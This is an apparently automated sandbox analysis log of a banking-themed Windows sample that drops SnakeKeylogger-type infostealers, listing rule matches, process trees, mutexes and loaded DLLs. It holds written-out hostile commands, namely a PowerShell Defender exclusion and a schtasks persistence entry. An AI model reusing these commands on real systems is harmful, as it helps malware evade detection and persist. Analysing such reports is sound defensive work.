Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: spadixes.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: spadixes.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: server02.exe.5.dr, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: server02.exe.5.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/28@10/6

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000CCE7A GetLastError,FormatMessageW,

0_2_000CCE7A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_000BB134
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000BAB84 AdjustTokenPrivileges,CloseHandle,	0_2_000BAB84
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_008FB134
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008FAB84 AdjustTokenPrivileges,CloseHandle,	2_2_008FAB84

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_000CE1FD

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_000C6532

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_000DC18C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0008406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0008406B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_04BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

5_2_04BACBD0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File created: C:\Users\user\AppData\Local\bothsided

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-85573514e2c8fb2a9e7986a9-b
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-85573514e2c8fb2a-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut8747.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\svchost.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: server02.exe, 0000000C.00000002.3712810154.0000000002980000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000294E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000296C000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000295E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3717802208.000000000389D000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.000000000298D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
